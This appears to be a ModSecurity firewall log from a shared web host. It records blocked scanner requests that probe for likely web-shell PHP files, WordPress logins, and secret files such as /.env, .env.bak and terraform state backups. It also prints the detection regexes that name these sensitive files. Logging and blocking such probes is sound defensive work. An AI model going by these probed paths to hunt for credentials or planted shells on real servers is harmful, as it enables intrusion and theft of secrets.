[Tue May 26 16:28:46.516914 2026] [security2:error] [pid 795941:tid 796147] [client 74.249.212.138:7051] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/8.php"] [unique_id "ahV85u2GQ_TLE_VHIp2xVwAAANE"]
[Tue May 26 16:28:46.517123 2026] [security2:error] [pid 795941:tid 796147] [client 74.249.212.138:7051] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/8.php"] [unique_id "ahV85u2GQ_TLE_VHIp2xVwAAANE"]
[Tue May 26 16:28:46.771788 2026] [security2:error] [pid 795941:tid 796160] [client 74.249.212.138:7094] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "webmail.gldmarsa.com"] [uri "/1.php"] [unique_id "ahV85u2GQ_TLE_VHIp2xXgAAAN4"]
[Tue May 26 16:28:46.771894 2026] [security2:error] [pid 795941:tid 796160] [client 74.249.212.138:7094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/1.php"] [unique_id "ahV85u2GQ_TLE_VHIp2xXgAAAN4"]
[Tue May 26 16:28:46.771985 2026] [security2:error] [pid 795941:tid 796160] [client 74.249.212.138:7094] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/1.php"] [unique_id "ahV85u2GQ_TLE_VHIp2xXgAAAN4"]
[Tue May 26 16:28:46.967936 2026] [security2:error] [pid 795941:tid 796100] [client 74.249.212.138:7078] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/100.php"] [unique_id "ahV85u2GQ_TLE_VHIp2xaAAAAKI"]
[Tue May 26 16:28:46.968038 2026] [security2:error] [pid 795941:tid 796100] [client 74.249.212.138:7078] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/100.php"] [unique_id "ahV85u2GQ_TLE_VHIp2xaAAAAKI"]
[Tue May 26 16:28:46.986163 2026] [security2:error] [pid 795941:tid 796168] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV85e2GQ_TLE_VHIp2xTQAAAOY"]
[Tue May 26 16:28:47.120650 2026] [security2:error] [pid 795941:tid 796051] [remote 211.23.68.235:19447] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahV85u2GQ_TLE_VHIp2xZgAAqm0"]
[Tue May 26 16:28:47.441734 2026] [security2:error] [pid 795941:tid 796184] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV85-2GQ_TLE_VHIp2xawAAAPY"]
[Tue May 26 16:28:47.559199 2026] [security2:error] [pid 795941:tid 796174] [client 74.249.212.138:7164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/about.php"] [unique_id "ahV85-2GQ_TLE_VHIp2xcwAAAOw"]
[Tue May 26 16:28:47.559295 2026] [security2:error] [pid 795941:tid 796174] [client 74.249.212.138:7164] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/about.php"] [unique_id "ahV85-2GQ_TLE_VHIp2xcwAAAOw"]
[Tue May 26 16:28:47.661308 2026] [security2:error] [pid 795941:tid 796182] [client 92.118.39.194:59242] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahV85-2GQ_TLE_VHIp2xdwAAAPQ"]
[Tue May 26 16:28:47.731862 2026] [security2:error] [pid 795941:tid 796151] [client 74.249.212.138:6989] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/admin.php"] [unique_id "ahV85-2GQ_TLE_VHIp2xeAAAANU"]
[Tue May 26 16:28:47.731972 2026] [security2:error] [pid 795941:tid 796151] [client 74.249.212.138:6989] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/admin.php"] [unique_id "ahV85-2GQ_TLE_VHIp2xeAAAANU"]
[Tue May 26 16:28:47.901511 2026] [security2:error] [pid 795941:tid 796097] [client 74.249.212.138:7130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/edit.php"] [unique_id "ahV85-2GQ_TLE_VHIp2xfAAAAJ8"]
[Tue May 26 16:28:47.901659 2026] [security2:error] [pid 795941:tid 796097] [client 74.249.212.138:7130] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/edit.php"] [unique_id "ahV85-2GQ_TLE_VHIp2xfAAAAJ8"]
[Tue May 26 16:28:48.327673 2026] [security2:error] [pid 795941:tid 796118] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV85-2GQ_TLE_VHIp2xdgAAALQ"]
[Tue May 26 16:28:48.342075 2026] [security2:error] [pid 795941:tid 796083] [client 74.249.212.138:7147] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/wp-content/admin.php"] [unique_id "ahV86O2GQ_TLE_VHIp2xiAAAAJE"]
[Tue May 26 16:28:48.342182 2026] [security2:error] [pid 795941:tid 796083] [client 74.249.212.138:7147] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/wp-content/admin.php"] [unique_id "ahV86O2GQ_TLE_VHIp2xiAAAAJE"]
[Tue May 26 16:28:48.429036 2026] [security2:error] [pid 795941:tid 796128] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV86O2GQ_TLE_VHIp2xhwAAAL4"]
[Tue May 26 16:28:48.478715 2026] [security2:error] [pid 795941:tid 796084] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV86O2GQ_TLE_VHIp2xiwAAAJI"]
[Tue May 26 16:28:48.937717 2026] [security2:error] [pid 795941:tid 796164] [client 74.249.212.138:7117] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/f6.php"] [unique_id "ahV86O2GQ_TLE_VHIp2xkgAAAOI"]
[Tue May 26 16:28:48.937829 2026] [security2:error] [pid 795941:tid 796164] [client 74.249.212.138:7117] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/f6.php"] [unique_id "ahV86O2GQ_TLE_VHIp2xkgAAAOI"]
[Tue May 26 16:28:49.218837 2026] [security2:error] [pid 795941:tid 796184] [client 74.249.212.138:6977] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/inputs.php"] [unique_id "ahV86e2GQ_TLE_VHIp2xnAAAAPY"]
[Tue May 26 16:28:49.218996 2026] [security2:error] [pid 795941:tid 796184] [client 74.249.212.138:6977] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/inputs.php"] [unique_id "ahV86e2GQ_TLE_VHIp2xnAAAAPY"]
[Tue May 26 16:28:49.234582 2026] [security2:error] [pid 795941:tid 796122] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV86e2GQ_TLE_VHIp2xmwAAALg"]
[Tue May 26 16:28:49.380586 2026] [security2:error] [pid 795941:tid 796126] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV86e2GQ_TLE_VHIp2xpQAAALw"]
[Tue May 26 16:28:49.401761 2026] [security2:error] [pid 795941:tid 796098] [client 74.249.212.138:7044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/av.php"] [unique_id "ahV86e2GQ_TLE_VHIp2xpwAAAKA"]
[Tue May 26 16:28:49.401856 2026] [security2:error] [pid 795941:tid 796098] [client 74.249.212.138:7044] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/av.php"] [unique_id "ahV86e2GQ_TLE_VHIp2xpwAAAKA"]
[Tue May 26 16:28:49.567766 2026] [security2:error] [pid 795941:tid 796175] [client 74.249.212.138:7124] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/classwithtostring.php"] [unique_id "ahV86e2GQ_TLE_VHIp2xqgAAAO0"]
[Tue May 26 16:28:49.567877 2026] [security2:error] [pid 795941:tid 796175] [client 74.249.212.138:7124] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/classwithtostring.php"] [unique_id "ahV86e2GQ_TLE_VHIp2xqgAAAO0"]
[Tue May 26 16:28:49.655787 2026] [security2:error] [pid 795941:tid 796074] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV86e2GQ_TLE_VHIp2xoQAAAIg"]
[Tue May 26 16:28:49.690771 2026] [security2:error] [pid 795941:tid 796143] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV86e2GQ_TLE_VHIp2xrQAAAM0"]
[Tue May 26 16:28:49.835129 2026] [security2:error] [pid 795941:tid 796155] [client 74.249.212.138:7132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/wp-content/themes/index.php"] [unique_id "ahV86e2GQ_TLE_VHIp2xsQAAANk"]
[Tue May 26 16:28:49.835270 2026] [security2:error] [pid 795941:tid 796155] [client 74.249.212.138:7132] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/wp-content/themes/index.php"] [unique_id "ahV86e2GQ_TLE_VHIp2xsQAAANk"]
[Tue May 26 16:28:50.107689 2026] [security2:error] [pid 795941:tid 796128] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV86u2GQ_TLE_VHIp2xuQAAAL4"]
[Tue May 26 16:28:50.292210 2026] [security2:error] [pid 795941:tid 796092] [client 74.249.212.138:7144] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/wp-blog.php"] [unique_id "ahV86u2GQ_TLE_VHIp2xvQAAAJo"]
[Tue May 26 16:28:50.292352 2026] [security2:error] [pid 795941:tid 796092] [client 74.249.212.138:7144] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/wp-blog.php"] [unique_id "ahV86u2GQ_TLE_VHIp2xvQAAAJo"]
[Tue May 26 16:28:50.519896 2026] [security2:error] [pid 795941:tid 796146] [client 47.128.26.113:10524] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.plenitudotonal.com"] [uri "/robots.txt"] [unique_id "ahV86u2GQ_TLE_VHIp2xygAAANA"]
[Tue May 26 16:28:50.584892 2026] [security2:error] [pid 795941:tid 796076] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV86u2GQ_TLE_VHIp2xyQAAAIo"]
[Tue May 26 16:28:51.066825 2026] [security2:error] [pid 795941:tid 796126] [client 74.249.212.138:7148] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "webmail.gldmarsa.com"] [uri "/___proxy_subdomain_webmail/wp-includes/js/jquery/"] [unique_id "ahV86-2GQ_TLE_VHIp2x0wAAALw"]
[Tue May 26 16:28:51.358395 2026] [security2:error] [pid 795941:tid 796115] [client 176.65.139.236:23582] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/.env"] [unique_id "ahV86-2GQ_TLE_VHIp2x4AAAALE"]
[Tue May 26 16:28:51.360320 2026] [security2:error] [pid 795941:tid 796095] [client 176.65.139.235:32698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "dimcorp.jhonweb.com"] [uri "/.env"] [unique_id "ahV86-2GQ_TLE_VHIp2x4QAAAJ0"]
[Tue May 26 16:28:51.363426 2026] [security2:error] [pid 795941:tid 796097] [client 176.65.139.236:23598] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "blog.jhonweb.com"] [uri "/.env"] [unique_id "ahV86-2GQ_TLE_VHIp2x4gAAAJ8"]
[Tue May 26 16:28:51.365267 2026] [security2:error] [pid 795941:tid 796111] [client 176.65.139.229:46670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "koneksi.jhonweb.com"] [uri "/.env"] [unique_id "ahV86-2GQ_TLE_VHIp2x4wAAAK0"]
[Tue May 26 16:28:51.368575 2026] [security2:error] [pid 795941:tid 796177] [client 176.65.139.238:22312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jhonparra.jhonweb.com"] [uri "/.env"] [unique_id "ahV86-2GQ_TLE_VHIp2x5AAAAO8"]
[Tue May 26 16:28:51.371983 2026] [security2:error] [pid 795941:tid 796139] [client 176.65.139.239:64182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "stvica.jhonweb.com"] [uri "/.env"] [unique_id "ahV86-2GQ_TLE_VHIp2x5QAAAMk"]
[Tue May 26 16:28:51.500219 2026] [security2:error] [pid 795941:tid 796193] [client 74.249.212.138:7148] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/wp-content/admin.php"] [unique_id "ahV86-2GQ_TLE_VHIp2x5wAAAP8"]
[Tue May 26 16:28:51.500334 2026] [security2:error] [pid 795941:tid 796193] [client 74.249.212.138:7148] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/wp-content/admin.php"] [unique_id "ahV86-2GQ_TLE_VHIp2x5wAAAP8"]
[Tue May 26 16:28:51.542965 2026] [security2:error] [pid 795941:tid 796187] [client 176.65.139.236:23614] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env"] [unique_id "ahV86-2GQ_TLE_VHIp2x7AAAAPk"]
[Tue May 26 16:28:51.892158 2026] [security2:error] [pid 795941:tid 796185] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV86-2GQ_TLE_VHIp2x9AAAAPc"]
[Tue May 26 16:28:52.231395 2026] [security2:error] [pid 795941:tid 796071] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV87O2GQ_TLE_VHIp2yAQAAAIU"]
[Tue May 26 16:28:52.272462 2026] [security2:error] [pid 795941:tid 796170] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV87O2GQ_TLE_VHIp2yBQAAAOg"]
[Tue May 26 16:28:52.424002 2026] [security2:error] [pid 795941:tid 796110] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV86-2GQ_TLE_VHIp2x8AAAAKw"]
[Tue May 26 16:28:52.509709 2026] [security2:error] [pid 795941:tid 796149] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV87O2GQ_TLE_VHIp2yDwAAANM"]
[Tue May 26 16:28:52.566181 2026] [security2:error] [pid 795941:tid 796180] [client 74.249.212.138:7116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/adminfuns.php"] [unique_id "ahV87O2GQ_TLE_VHIp2yEwAAAPI"]
[Tue May 26 16:28:52.566295 2026] [security2:error] [pid 795941:tid 796180] [client 74.249.212.138:7116] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/adminfuns.php"] [unique_id "ahV87O2GQ_TLE_VHIp2yEwAAAPI"]
[Tue May 26 16:28:53.835834 2026] [security2:error] [pid 795941:tid 796197] [client 92.118.39.194:33060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/s3/.env.bak"] [unique_id "ahV87e2GQ_TLE_VHIp2yPQAAAQM"]
